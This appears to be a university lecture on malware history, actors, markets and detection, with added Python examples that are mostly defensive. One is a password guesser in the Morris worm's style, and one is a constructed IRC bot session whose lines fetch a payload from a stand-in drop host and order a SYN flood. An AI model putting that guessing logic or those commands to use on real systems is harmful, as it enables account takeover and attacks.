Malware - California State Polytechnic University, Pomona
Malware, aka "BritneySpears.mp3.vbs"
Malware: What is malware?
• A "-ware" word that started out as a synonym for computer viruses.
• Essentially a program that does something malicious, hence malware.
• Nowadays it carries the connotation of a long-lived program that stays on the machine, rather than a one-shot infector.
• Encompasses a whole class of software:
• Scareware
• Ransomware
• Botnets
Malware: Scareware
• Software designed to make you think you're infected with something.
• Essentially a fake anti-virus that, once you install it, acts as a backdoor or something worse.
Malware: Ransomware
• An amusing inversion: encryption, normally a means of protection, used as the weapon.
• Malware that encrypts your files and demands that you send money for the key to decrypt them.
• Surprisingly effective.
Malware: Botnets
• The big, bad, infamous malware you hear about today.
• Programs designed to turn a computer into a "zombie" under someone else's remote control.
• Typically used to carry out distributed denial of service (DDoS) attacks and to send spam.
The History
Malware: History
• It all started as a prank.
• In 1982, Richard Skrenta sabotaged pirated copies of games he gave to his friends.
• Once his friends wised up, he wrote "Elk Cloner", one of the first self-replicating computer viruses seen in the wild; it spread from Apple II floppy to floppy.
Malware: History
• By the way...
Malware: History
• But obviously, that's not the platform where malware took off.
• In 1986, two brothers running a computer shop in Pakistan noticed the boot sector at the start of their floppy disks: a small block of code the machine runs before anything else.
• They replaced it with their own code, which copied itself to other floppies and changed the disk's volume label to "(c)Brain".
Malware: History
• In 1988, the Morris worm spread across the Internet.
• It exploited a buffer overflow in fingerd, the DEBUG command in sendmail, trust relationships between hosts (rsh/rexec) and weak passwords on the systems it reached.
• Due to a flaw in how it checked whether a machine was already infected, it reinfected hosts over and over; the resulting load took down far more systems than its author intended.
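The "weak passwords" leg deserves a closer look, because it is the one part of the worm that needs no software bug at all. The worm built its first guesses from the account entry itself (no password, the username, the username doubled, the user's first and last name, the surname reversed) and only then fell back to a built-in word list. The following is an added example written for this page, not the worm's code: it reimplements that guessing order as a password audit over a constructed account table. The account names, GECOS fields and the six-word dictionary are made up; SHA-256 stands in for the crypt(3) hashes a 1988 password file actually held, which the worm attacked the same way.

```python
import hashlib

def hash_password(pw):
    """Hash helper so the sample table holds no plaintext.  A real 1988 passwd
    file held crypt(3) hashes; the worm hashed each guess and compared, as here."""
    return hashlib.sha256(pw.encode()).hexdigest()

# Constructed sample account table: username -> (GECOS full name, password hash).
SAMPLE_ACCOUNTS = {
    "rtm":   ("Robert Morris", hash_password("morris")),      # surname
    "alice": ("Alice Liddell", hash_password("alicealice")),  # username doubled
    "bob":   ("Bob Cratchit",  hash_password("tihctarc")),    # surname reversed
    "carol": ("Carol Danvers", hash_password("X9#q!v2Lp")),   # unrelated to the account
}

# Stand-in for the worm's built-in list of a few hundred common passwords (assumed words).
SMALL_DICTIONARY = ["password", "secret", "wizard", "academia", "cornelius", "aaa"]

def derived_guesses(username, gecos):
    """Guesses built purely from account data, tried before any dictionary:
    no password, the username, the username doubled, first name, surname,
    surname reversed.  Order matters: cheapest and most likely first."""
    parts = gecos.lower().split()
    first = parts[0] if parts else ""
    last = parts[-1] if parts else ""
    candidates = ["", username, username * 2, first, last, last[::-1]]
    ordered = []
    for c in candidates:          # de-duplicate while keeping order
        if c not in ordered:
            ordered.append(c)
    return ordered

def guess_password(username, gecos, pw_hash, dictionary=SMALL_DICTIONARY):
    """Return the first guess whose hash matches, or None if every guess fails."""
    for guess in derived_guesses(username, gecos) + list(dictionary):
        if hash_password(guess) == pw_hash:
            return guess
    return None

def audit(accounts):
    """Run the guesser over a whole account table, the way a defender would check
    which passwords the worm would have cracked.  Returns username -> password or None."""
    return {user: guess_password(user, gecos, pw_hash)
            for user, (gecos, pw_hash) in accounts.items()}

if __name__ == "__main__":
    for user, cracked in audit(SAMPLE_ACCOUNTS).items():
        print(f"{user:6} {'weak: ' + cracked if cracked else 'survived'}")
```

Three of the four constructed accounts fall to the account-derived guesses alone, before the dictionary is even consulted; only the password with no relation to the account survives. That is the whole lesson of this leg of the worm: the attacker's first guesses are the ones you hand them in the account record.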
Malware: History
• More viruses started to show up after (c)Brain and Morris.
• .COM and .EXE files started getting infected: file infectors, as opposed to boot-sector viruses.
• "Cascade" became the first widely known virus to hide its code by storing itself encrypted and decrypting at run time.
Malware: History
• Viruses soon began exhibiting anti-detection techniques.
• The "1260" virus (1990) is generally credited as the first polymorphic virus: it varied its own decryption routine from infection to infection, so no fixed byte string identified it.
• The Whale virus went further, combining polymorphism with anti-debugging tricks, so that it looked different every time it was executed.
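The reason encryption and polymorphism mattered is that scanners of the day worked by byte signature. An added example for this page (a toy, not Cascade's, 1260's or Whale's code) makes the point concrete: a constructed "virus body" is XOR-encoded behind a tiny decoder stub, a static scan of the stored bytes misses it, and the fix that scanners actually adopted, emulating the decoder until the real body appears, finds it again. The stub format (`[junk_len][junk][DEC][key][body]`), the payload string and the signature are all invented for the example; `junk_len > 0` stands in for a polymorphic engine padding its decoder differently each time.

```python
import random

PAYLOAD = b"echo pwned > /dev/console"   # constructed stand-in for a virus body
SIGNATURE = b"/dev/console"               # the byte string a naive scanner keys on
STUB_MAGIC = b"DEC"                       # marks the toy decoder; real stubs are a few x86 instructions

def xor_encode(data, key):
    """Symmetric XOR with a one-byte key: the same call encodes and decodes."""
    return bytes(b ^ key for b in data)

def build_sample(payload, key, junk_len=0, seed=0):
    """Lay out an 'infected file': [junk_len][junk][STUB_MAGIC][key][encoded body].
    junk_len == 0 gives a constant decoder, Cascade style.  junk_len > 0 pads the
    decoder with varying filler, standing in for a 1260/Whale-style engine that
    rewrites its decoder on every infection."""
    if not 1 <= key <= 255:
        raise ValueError("key 0 would leave the body in the clear")
    rng = random.Random(seed)
    junk = bytes(rng.randrange(256) for _ in range(junk_len))
    return bytes([junk_len]) + junk + STUB_MAGIC + bytes([key]) + xor_encode(payload, key)

def static_scan(sample, signature=SIGNATURE):
    """Pattern match over the bytes exactly as they sit on disk."""
    return signature in sample

def decoder_stub(sample):
    """Everything before the encoded body: the only part that stays constant
    across infections, hence the only part a static signature could target."""
    junk_len = sample[0]
    return sample[:1 + junk_len + len(STUB_MAGIC) + 1]

def emulate_and_scan(sample, signature=SIGNATURE):
    """What scanners did about encrypted viruses: 'run' the decoder far enough
    for the real body to appear in memory, then match signatures against that."""
    junk_len = sample[0]
    pos = 1 + junk_len
    if sample[pos:pos + len(STUB_MAGIC)] != STUB_MAGIC:
        return False                      # not our toy format: nothing to emulate
    key = sample[pos + len(STUB_MAGIC)]
    body = xor_encode(sample[pos + len(STUB_MAGIC) + 1:], key)
    return signature in body

if __name__ == "__main__":
    for junk in (0, 8):
        s = build_sample(PAYLOAD, 0x5A, junk_len=junk)
        print(f"junk={junk:2}: static={static_scan(s)} emulated={emulate_and_scan(s)} "
              f"stub={decoder_stub(s).hex()}")
```

With `junk_len=0` the stub is byte-for-byte identical from one infection to the next, which is why Cascade was still catchable by a signature on its decryptor. Once the stub itself varies, even that signature is gone, and the scanner is left with emulation (or a heuristic on what the stub does) as its only static option. The toy only pads the stub; a real polymorphic engine also rewrites the decoder's instructions, which is harder still.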
Malware: History
• And then came...
Malware: History
• Surprisingly, viruses died down for a while.
• Most viruses were written for DOS (and Unix). Once Windows took over the desktop, the DOS viruses typically crashed the computer before Windows got a chance to fully boot, so they stopped spreading well.
• Boot sector viruses, for the time being, mostly became an endangered species.
Malware: History
• Office programs on Windows became popular.
• Macro viruses started popping up: a macro is code stored inside the document itself, run by the office application when the document is opened.
• The aptly-named Concept virus (1995) simply replicated itself from document to document, then popped up the message "That's enough to prove my point."
Malware: History
• Then came the Melissa virus (1999).
• Melissa and macro viruses like it infected documents on both Macintosh and Windows, because the macro runs inside Word rather than on the operating system; Melissa's mass-mailing step, though, needed Outlook on Windows.
• Word and Excel, the most popular office programs at the time, were both susceptible.
Malware: History
The comment block at the top of Melissa's own macro source:
  WORD/Melissa written by Kwyjibo
  Works in both Word 2000 and Word 97
  Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
  Word -> Email | Word 97 <-> Word 2000 ... it's a new age!
The Evolution
Malware: Evolution
• The term "virus" was first coined in 1983 (usually credited to Fred Cohen's work on self-replicating programs).
• Because of the boot-sector and file modifications many of these programs made, the easiest way to describe them was to call them a virus.
• Interestingly, as time went on, viruses came to quite literally evolve to reflect their biological definition.
Malware: Evolution
• A biological virus is:
• something that spreads rapidly and effectively
• something that lives for long periods of time on its host
• something that leeches resources from its host
Malware: Evolution
• The anonymity of the Internet makes malware quite interesting from a biological standpoint.
• Obviously each one is created by someone's hand, but it is faceless.
• It does exactly what it was designed to do and nothing more.
Malware: Evolution
• After the "prank" stage, the early development of malware moved on to the destructive stage.
• The intent of the virus was to infect and destroy.
• The Chernobyl (CIH) virus, once triggered, overwrote the flash BIOS on susceptible motherboards and the first part of the hard disk, leaving the host unable to boot.
Malware: Evolution
• The discovery of generalized exploitation techniques, in combination with a poorly secured Windows operating system, caused malware to evolve rapidly from the late nineties onward.
• Aleph One's "Smashing the Stack for Fun and Profit" (Phrack 49, 1996) laid out stack buffer overflow exploitation step by step for anyone to read.
• Worms and viruses began spreading with more intent than destruction and modification.
Malware: Evolution
• Macro viruses were essentially documents, which made them far more likely to spread: nobody thinks of a document as a program.
• Stupid people exist. By that virtue, stupid people will do stupid things, like opening files from people they don't even know.
• People would open BUSHJO~1.DOC thinking they'd be getting some hilarious jokes about Bush Sr., and *poof*.
Malware: Evolution
• By the late 90s, worms evolved from just spreading to staying on their hosts for long periods of time.
• They served specific purposes, such as acting as a back door or running a mail server.
• These ad hoc mail servers also allowed for the automated e-mailing of further malware.
Malware: Evolution
• By the 21st century, worms and viruses stopped being solely destructive.
• High-profile worms such as Code Red (2001) spread with a purpose beyond spreading: it defaced web pages on the IIS servers it infected and pointed a DDoS at a fixed address.
• There was money to be made and systems to control.
Malware: Evolution
• Malware is in a constant back-and-forth between being detected and evading detection.
• This directly reflects the natural evolution of viruses.
The Characters: The jerks who keep you up at night.
Malware: Motivations
• Curiosity and knowledge
• VX Heavens (the virus-exchange site where samples and source were traded)
• Amusement
• “That’s enough to prove my point”
• Destruction
• Power
• Money
Malware: Botkids
• Typically from EFnet, but they exist on pretty much every IRC network.
• PP4L and GNAA have a few botkids among their ranks.
• Used mostly for chat-spamming and DDoS.
• One of the main reasons IRC usage is, irrationally, banned on most networks.
Malware: Ubisoft
• Ubisoft implements an online-based DRM scheme (2010): the game checks in with Ubisoft's servers to run.
• Botkids DDoS the hell out of it, and legitimate players can't play.
• People get angry.
• Botkids win.
Malware: Scientology
• /b/tards have everyone from botkids to botmasters.
• /b/ implemented something rather amusing: the consensual botnet.
• People literally installed programs onto their computers so that a botmaster could use them to help DDoS Scientology.
• I'm totally serious.
• People actually did this.
Malware: Rooters
• Some of the people you should thank for your free music and movies.
• People who hijack a server on a beefy pipe and install rootkits on it.
• Typically where piracy "topsites" run their distribution operations.
Malware: Rooters
• These guys obviously want to hide from the authorities.
• Computers get infected purely to be bounced through for anonymity's sake, creating a long chain of infected hosts that ultimately masks where they are coming from or connecting from.
• Think of it like a private, illegal Tor network.
Malware: Organized Crime
• "Nice website you got here. Be a shame if someone DDoS'd it..."
• Botnets typically used for extortion and fraud.
• Targeted malware that does nothing more than sniff social security numbers, credit card information and more.
Malware: Politics
• Russian government entities have gone to black-hats in their country to take down dissidents.
• Numerous inter-country incidents have occurred over the years involving computer warfare.
Malware: The Estonia Incident
• Estonia decides to relocate a Soviet-era war memorial, the Bronze Soldier, out of central Tallinn (2007).
• Russian nationalists don't like this.
• Weeks of DDoS attacks knock Estonian government, bank and media websites offline.
Malware: Russia vs. Georgia
• A well-known Georgian blogger (Cyxymu) comments on the 2008 Georgian-Russian conflict; in August 2009 his accounts become the target.
• Russian nationalists don't like this.
• So they DDoS Blogger, Twitter, Facebook and LiveJournal, the sites hosting his accounts, knocking Twitter offline for hours and badly degrading the others.
Malware: China and Operation Aurora
• Chinese hackers want source code, among other things.
• They perform a targeted attack on Google, Adobe and many other software companies (late 2009), reportedly delivered through malicious PDF files and an unpatched Internet Explorer flaw.
• The attack was a success and obviously freaked out a lot of Important People.
• The true impact of the attack is still being investigated.
The Game
Malware: The Game
• A majority of people honestly believe that hacking cannot be prevented. Being hacked is an act of nature.
• Think about that.
Malware: The Game
• The easiest way to spread malware is to trick the user into running the program.
Malware: The Game
• The infector does not care about sophistication or, necessarily, about being as sneaky as possible.
• It works the same way as spam: it doesn't matter if 99% of the people who receive it delete it, only that 1% buy into it and send money.
• The weakest link is the best link to attack.
• The majority of infections are caused by people willingly running them.
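The deck's own title, "BritneySpears.mp3.vbs", is the classic version of this trick: Windows hides the real extension by default, the mail client shows an MP3 icon, and the user double-clicks a script. A mail gateway can catch most of these with a few filename rules. The following is an added example written for this page, not from the slides: it checks an attachment name for an executable extension, a decoy extension in front of it, padding spaces that push the real extension out of view, and (going one step beyond the slides) the Unicode right-to-left override that renders "photo\u202egpj.exe" as "photoexe.jpg". It also marks macro-capable Office formats separately, since that is where a macro virus lives. The extension lists and the sample names are the editor's choices.

```python
import os

# Extensions Windows will run (or hand to a script host) on double-click.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".vbe",
                   ".js", ".jse", ".wsf", ".hta", ".lnk"}
# Macro-capable Office formats: not executable by themselves, but a macro virus lives here.
MACRO_DOC_EXTS = {".doc", ".dot", ".xls", ".xlt", ".docm", ".xlsm"}
# Extensions people expect to be harmless; a genuine one never needs a second extension after it.
DECOY_EXTS = {".mp3", ".jpg", ".jpeg", ".gif", ".png", ".txt", ".pdf", ".avi", ".zip"}

RLO = "\u202e"  # Unicode right-to-left override: reverses how the rest of the name is displayed

def all_extensions(name):
    """'BritneySpears.mp3.vbs' -> ['.mp3', '.vbs'], lowercased, surrounding spaces stripped."""
    base = name.strip()
    exts = []
    while True:
        base, ext = os.path.splitext(base)
        ext = ext.strip().lower()
        if not ext:
            break
        exts.append(ext)
    return list(reversed(exts))

def classify_attachment(name):
    """Return the list of reasons the name looks deceptive; an empty list means none found."""
    reasons = []
    if RLO in name:
        reasons.append("right-to-left override character hides the real extension")
    clean = name.replace(RLO, "")
    exts = all_extensions(clean)
    if not exts:
        return reasons
    final = exts[-1]
    if final in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {final}")
        if len(exts) > 1 and exts[-2] in DECOY_EXTS:
            reasons.append(f"decoy extension {exts[-2]} in front of {final}")
    if final in MACRO_DOC_EXTS:
        reasons.append(f"macro-capable document {final}")
    # A long run of spaces before the last extension pushes it off the visible part of the name.
    stem = clean.rsplit(".", 1)[0]
    if len(stem) - len(stem.rstrip()) >= 5:
        reasons.append("padding spaces hide the final extension")
    return reasons

def is_suspicious(name):
    """Block-worthy: anything except the (lower-severity) macro-document note."""
    return any(not r.startswith("macro-capable") for r in classify_attachment(name))

if __name__ == "__main__":
    # Constructed sample attachment names.
    for sample in ["BritneySpears.mp3.vbs", "quarterly_report.pdf", "BUSHJO~1.DOC",
                   "invoice.pdf" + " " * 30 + ".exe", "photo\u202egpj.exe"]:
        print(repr(sample), classify_attachment(sample))
```

The document case is deliberately a note rather than a block: "BUSHJO~1.DOC" is what every real attachment in a 1990s office looked like, so the only workable policy there is to strip or sandbox the macros, not to reject the file. The executable cases have no such excuse.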
Malware: The Game
• While that obviously works... it can take time.
• Automated spamming of networks such as AIM and MSN will get your accounts banned.
• CAPTCHA-breaking costs money: the solving services charge per image.
• The next step up is exploitation.
Malware: The Game
• We're still not at remote exploits yet, though.
• Social engineering is one of the key components of hijacking someone's system.
• Therefore, the next step is to find vulnerabilities in a piece of software that someone will open a file with: a document reader, a browser plugin, a media player.
• Kind of like macro viruses.
Malware: The Game
• I just wanted to take the time to laugh at this bug:
• Seriously. It doesn’t stop getting old.
Malware: The Game
• Remote exploits are essentially at the bottom of the priority list.
• Current network configurations put multiple computers behind a single NAT gateway, which makes unsolicited inbound attacks more complicated and not the most appealing vector.
Malware: The Game
• One would assume that unknown exploits, or 0day exploits, would be the most frequent vector. Not true.
• 0days go for a lot of money. More on that later.
• It would be unwise to waste an 0day unless the target, or the payoff from using the exploit, warranted it: once used, it gets seen, and once seen, it gets patched.
Malware: The Game
• Because of the splintering of update systems (every vendor ships its own updater), people find it frustrating to keep their software updated.
• So they don't.
• And they get owned.
• This is why Conficker, which exploits a hole Microsoft patched in 2008, is still a problem.
Malware: The Game
• China and other countries in the region tend to have more infections per capita than many other countries.
• This is due to the rampant piracy in the region (pirated Windows installs often cannot, or do not, take updates) in combination with the bad update practices users everywhere share.
Malware: Targeted attacks
• Sometimes a given network, like Google's, is exactly what the baddies want.
• Aurora was a great example.
• This is where the concept of an "advanced persistent threat" comes from.
• ...but please ignore that phrase whenever possible. It's a marketing gimmick.
The Pieces
Malware: The Pieces
• Packers were popularized by the 64K demoscene, where they were used to compress binaries as much as humanly (or inhumanly) possible: a small stub decompresses the real program into memory at run time and jumps to it.
• Packers are now used quite frequently in malware.
• Now they come with features such as polymorphism and anti-debugging techniques.
Malware: The Pieces
• Protectors and cryptors are used to obfuscate a program so that its real code only appears at execution time.
• These, too, use techniques such as polymorphism and anti-debugging and anti-analysis tricks to protect the underlying program.
Malware: Packers vs. Protectors
• Packers and protectors share a lot of common ground.
• However, the core difference is purpose.
• A packer's objective is to compress the binary; the obfuscation is only a side effect of the packing.
• A protector does exactly what it says: it protects the program from analysis.
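Whatever the purpose, a packed or protected binary has a shape an analyst can measure: a small readable stub followed by a body that is compressed or encrypted, and compressed or encrypted bytes are close to uniformly distributed. Shannon entropy per byte makes that visible without unpacking anything. The following is an added example for this page, not from the slides or any packer: it computes entropy over fixed windows of a constructed "packed executable" (1 KiB of plain-text stub, then 8 KiB of seeded random bytes standing in for the compressed, encrypted body) and flags the high-entropy region. The stub text, the window size and the 7.0-bit threshold are the editor's choices.

```python
import math
import random
from collections import Counter

def shannon_entropy(data):
    """Bits per byte: 0.0 for one repeated value, 8.0 when all 256 values are
    equally common."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

def scan_windows(blob, window=1024, threshold=7.0):
    """Entropy of each fixed-size window, with a flag when it crosses the
    threshold.  Code and text score roughly 4 to 6.5 bits; compressed or
    encrypted data sits close to 8, the tell-tale of a packed body."""
    out = []
    for off in range(0, len(blob), window):
        ent = shannon_entropy(blob[off:off + window])
        out.append((off, round(ent, 2), ent >= threshold))
    return out

def looks_packed(blob, window=1024, threshold=7.0, min_fraction=0.5):
    """True when at least min_fraction of the windows are high-entropy."""
    res = scan_windows(blob, window, threshold)
    if not res:
        return False
    return sum(1 for _, _, flagged in res if flagged) / len(res) >= min_fraction

def build_sample_packed(seed=7):
    """Constructed stand-in for a packed executable: 1 KiB of plain-text
    'unpacker stub' followed by 8 KiB that an assumed packer has compressed and
    encrypted.  Seeded random bytes play the encrypted body; a real compressed
    or RC4/XOR-encrypted section has the same flat byte distribution."""
    stub = (b"; unpacker stub: inflate body, fix imports, jump to entry\n" * 40)[:1024]
    rng = random.Random(seed)
    body = bytes(rng.randrange(256) for _ in range(8192))
    return stub + body

SAMPLE_PACKED = build_sample_packed()
# Unpacked stand-in: ordinary repetitive code-like text of the same length.
SAMPLE_PLAIN = (b"mov eax, [ebp+8]\ncall handler\nret\n" * 300)[:9216]

if __name__ == "__main__":
    for off, ent, flagged in scan_windows(SAMPLE_PACKED):
        print(f"offset {off:5d}  entropy {ent:4.2f}  {'PACKED?' if flagged else ''}")
    print("looks packed:", looks_packed(SAMPLE_PACKED), "/ plain:", looks_packed(SAMPLE_PLAIN))
```

Two caveats worth keeping in mind when turning this into a rule. Small windows cap the achievable entropy (256 random bytes can only reach about 7.3 bits, since at most 256 distinct values are present), so the threshold has to be tuned to the window size. And high entropy says "compressed or encrypted", not "malicious": installers, media and signed-but-packed commercial software all trip it, which is why entropy is a triage signal rather than a verdict.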
Malware: The Pieces
• Bots tend to ship with a set of exploits in order to spread themselves further.
• These bundles are called "exploit packs."
• They're usually purchased from a third party and built into the bot.
Malware: Command and Control
• Command and control (C&C) servers are the central locations that bots phone home to for orders.
• They take on multiple forms.
Malware: IRC-based C&C
• A good majority of botnets, from the hundreds to the thousands to the millions of bots, use IRC.
• IRC is a simple, text-based protocol with a rich history, numerous servers, and plenty of options (channel keys, modes, cloaked hosts) to protect the identity of the botmaster, his bots and his control over them.
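Because the protocol is plain text, it is also easy to watch. An IRC bot betrays itself in a handful of ways: an auto-generated nick, a join to a keyed channel, and orders that arrive as the channel topic (the bot reads its standing orders the moment it joins) or as a PRIVMSG from the botmaster, written in a terse dotted command syntax. The following is an added example for this page, not from the slides or any bot: a minimal RFC 1459 line parser plus a session scorer run over two constructed sessions. The command words and the `[COUNTRY|OS|number]` nick pattern are the editor's heuristics, modelled on the SDBot/Agobot family; the hostnames, channel and addresses are made up.

```python
import re

IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<command>\S+)(?: (?P<params>.*))?$")

# Command words used by the SDBot/Agobot family of IRC bots, always behind a '.' or '!' (assumed list).
BOT_COMMAND = re.compile(r"^[.!](ddos|syn|udp|scan|advscan|download|dl|update|login|keylog)\b", re.I)
# Auto-generated nicks of the form [COUNTRY|OS|number], another family trait (assumed pattern).
BOT_NICK = re.compile(r"^\[[A-Z]{2,3}\|[A-Za-z0-9]+\|\d+\]$")

def parse_irc(line):
    """Split one RFC 1459 line into prefix nick, command, middle params and trailing text."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    prefix, command = m.group("prefix"), m.group("command").upper()
    rest = m.group("params") or ""
    if rest.startswith(":"):
        middle, trailing = [], rest[1:]
    elif " :" in rest:
        head, trailing = rest.split(" :", 1)
        middle = head.split()
    else:
        middle, trailing = rest.split(), None
    nick = prefix.split("!", 1)[0] if prefix else None
    return {"nick": nick, "command": command, "params": middle, "trailing": trailing}

def analyze_session(lines):
    """Score one client's IRC session (as reconstructed from a packet capture)
    for bot traits: a generated nick, a keyed channel join, and commands arriving
    via the channel topic (numeric 332 on join, or TOPIC) or via PRIVMSG."""
    ind = {"bot_nick": False, "joined": [], "commands": [], "topic_command": False}
    for line in lines:
        msg = parse_irc(line)
        if msg is None:
            continue
        if msg["command"] == "NICK" and msg["params"] and BOT_NICK.match(msg["params"][0]):
            ind["bot_nick"] = True
        elif msg["command"] == "JOIN" and msg["params"]:
            ind["joined"].append(msg["params"][0])
        text = msg["trailing"] or ""
        if msg["command"] in ("PRIVMSG", "TOPIC", "332") and BOT_COMMAND.match(text):
            ind["commands"].append(text.split()[0])
            if msg["command"] != "PRIVMSG":
                ind["topic_command"] = True
    ind["verdict"] = ind["bot_nick"] and bool(ind["commands"])
    return ind

# Constructed sessions: what a bot and a person look like on the wire.
SAMPLE_BOT_SESSION = [
    "NICK [USA|XP|482913]",
    "USER x 0 0 :x",
    "JOIN #upd8 k3y",
    ":irc.example.test 332 [USA|XP|482913] #upd8 :.update http://drop.example.test/b.exe 1",
    ":owner!o@cloak PRIVMSG #upd8 :.ddos.syn 203.0.113.7 80 600",
]
SAMPLE_HUMAN_SESSION = [
    "NICK alice",
    "JOIN #python",
    ":bob!b@h PRIVMSG #python :anyone know if .strip() removes tabs too?",
]

if __name__ == "__main__":
    print("bot:  ", analyze_session(SAMPLE_BOT_SESSION))
    print("human:", analyze_session(SAMPLE_HUMAN_SESSION))
```

The parser is the reusable part; the scoring is deliberately crude and keyed to one bot family, which is how real IRC botnet signatures looked as well. The topic check matters more than it seems: a bot that joins and immediately acts on the 332 reply has no human-like conversation at all, and that silence is as good an indicator as the commands themselves.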
Malware: P2P-based C&C
• IRC-based C&C, in some ways, can be really easy to smash. Not every botmaster hosts his own IRC server, and if he does, it's easy to ask the hosting provider to take it down.
• The Storm worm instead used a peer-to-peer protocol (derived from eDonkey's Overnet) to control the bots in the network.
• This removed the single point of failure that an IRC server represents: there was no one box to take down.
Malware: Facebook-based C&C
• Mikko Hypponen and the F-Secure team found a botnet that used Facebook as its means of command and control.
• An SMS message was sent to a Facebook account to save a note.
• The bots had access to this Facebook account.
• Depending on the subject and the contents of the note, they carried out the master's wishes.
Malware: Twitter-based C&C
• The same idea goes for Twitter.
• Bots would follow a single account on Twitter, parse the most recent status update, then carry out the commands.
Malware: The Pieces
• Drop-servers are typically where exploits and malware are stored, ready to be shipped and delivered.
• In the context of browser-based exploits, this is usually where the malicious JavaScript is hosted.
• Like scam artists' storefronts, these are usually one-stop shops with a short life: set up, drop off and get out, all in the span of a few days or less.
Malware: The Pieces
• Rootkits are one of the most important pieces of modern malware.
• Rootkits take advantage of the detailed intricacies of the operating system to hide the malware from the user-- and, ultimately, from the anti-virus software running on that system.
The Market
Malware: The Market
• The malware scene consists of many, many people. So, naturally, a marketplace exists.
• Think of it like a war bazaar.
Malware: The Market
• Programmers sell their wares:
• Packers and protectors
• Cryptors
• Bot software
• Rootkits
Malware: The Market
• Exploit writers and researchers sell their 0day exploits to those who wish to buy.
• On the black market, this is done in private amongst people who know each other.
• Out in the open, this is done through programs such as the Zero Day Initiative and iDefense.
• A good 0day can net $80,000 or more.
Malware: The Market
• HD Moore estimates that browser 0-days have a market price of $5,000 per 1% of browser market share.
• Internet Explorer has around 60% market share.
• You’re CS majors-- do the math.
Malware: The Market
• Botmasters also sell and lease their botnets to anyone who wants bot-based services.
• “You want to perform a DDoS attack on Twitter? Well, that’ll take X bandwidth, which comes out to Y bots... that’ll run you about $2,000 a minute, minimum ten minutes.”
• The going rate for a single node in a botnet is about ten cents.
Malware: The Market
• Surprisingly, botmasters are more abundant than the bot authors themselves. This is probably why individual bots are so cheap.
• Obviously, it's easier to buy a bot program and use it than to go through all the research necessary to create your own bot.
• More sophisticated botnets even come with tech support.
Malware: The Market
• Here’s another story from Russia...
Detection
Malware: Detection
• Analyzing and detecting malware is a surprisingly difficult problem.
• Anti-virus software and malware have been in an arms race for decades.
• Highly appropriate that one of the biggest malware producers in the world-- China-- is communist.
• Not to mention Russia. But I’ve already mentioned them too much.
Malware: Detection
• Anti-virus engines started out by generating signatures from specific byte sequences found at fixed locations within a given program.
• This was circumvented by polymorphism: each copy of the malware re-encodes its body differently, so the fixed bytes the signature keys on never repeat.
Malware: Detection
• Anti-virus engines then started using heuristic algorithms in order to identify the malicious code that existed in these programs.
• This was circumvented by-- hilariously-- studying the algorithms and getting around them.
• Repeat ad infinitum.
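As an added illustration of the two slides above (this is not from the original deck): a fixed-byte signature misses two re-keyed variants of a constructed sample body, while the classic "X-ray" heuristic, which brute-forces a single-byte XOR layer and looks for the signature underneath, catches both. The sample bytes, the stub layout and every function name here are constructed for this example.

```python
# Added example (not from the slides): why fixed-byte signatures miss
# polymorphic variants, and the "X-ray" heuristic AV engines used in reply.
# All data here is constructed for illustration; nothing is a real sample.
from typing import Dict, Optional, Tuple

# Constructed stand-in for a static malware body. A real signature would be a
# distinctive byte sequence found at a fixed spot in the original program.
BODY = b"CONSTRUCTED-SAMPLE: this stands in for a static malware body"
SIGNATURE = b"CONSTRUCTED-SAMPLE"          # the fixed bytes the scanner keys on


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the simplest body encoding a polymorphic engine uses."""
    return bytes(b ^ key for b in data)


def polymorphic_variant(body: bytes, key: int) -> bytes:
    """Constructed 'variant': a two-byte marker stub carrying the key, followed by
    the XOR-encoded body. Each copy uses a different key, so body bytes never repeat."""
    stub = bytes([0xEB, key])            # placeholder stub, not real decoder code
    return stub + xor_bytes(body, key)


def signature_scan(sample: bytes, sig: bytes = SIGNATURE) -> bool:
    """Classic static detection: look for the signature bytes exactly as-is."""
    return sig in sample


def xray_scan(sample: bytes, sig: bytes = SIGNATURE) -> Optional[int]:
    """X-ray heuristic: assume a single-byte XOR layer, try every key and look for
    the signature underneath. Returns the key that exposes it, or None."""
    for key in range(256):
        if sig in xor_bytes(sample, key):
            return key
    return None


def demo() -> Dict[str, Tuple[bool, Optional[int]]]:
    """Scan the plain body and two re-keyed variants with both detectors."""
    variants = {
        "plain": BODY,
        "key_0x5a": polymorphic_variant(BODY, 0x5A),
        "key_0xc3": polymorphic_variant(BODY, 0xC3),
    }
    return {name: (signature_scan(v), xray_scan(v)) for name, v in variants.items()}


if __name__ == "__main__":
    for name, (sig_hit, xray_key) in demo().items():
        print(f"{name:9s} signature={sig_hit!s:5s} xray_key={xray_key}")
```

The plain body is caught by both detectors (X-ray with key 0), while the two variants are caught only by the X-ray pass; the next round of the arms race, as the slide says, is the malware author studying that heuristic and switching to an encoding the brute force does not cover.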
Malware: Detection
• Obviously, in order to glean any sort of signature information from a given binary, one must analyze the program.
• Malware then began shipping with anti-debugging and anti-analysis tricks.
• With each passing trick, one was circumvented and three were created.
Malware: Detection
• Malware analysis has gotten to the point where anti-virus companies are using emulators and other highly complex techniques in order to analyze a binary.
• And the malware authors have found vulnerabilities in this process, not to mention anti-emulation techniques that prevent the researchers from getting any semblance of analysis done!
Conclusions
Malware: Conclusions
• Malware exhibits properties similar to biological viruses: attempts to eradicate it drive it to evolve and become stronger and more resistant.
• Malware has a lot of money behind it-- spammers, scammers and other baddies have their hands deep in the game.
Malware: Conclusions
• Malware is hard to detect. It is always evolving, always changing and always masking itself.
• People are stupid.
• Therefore, malware will always exist.
The End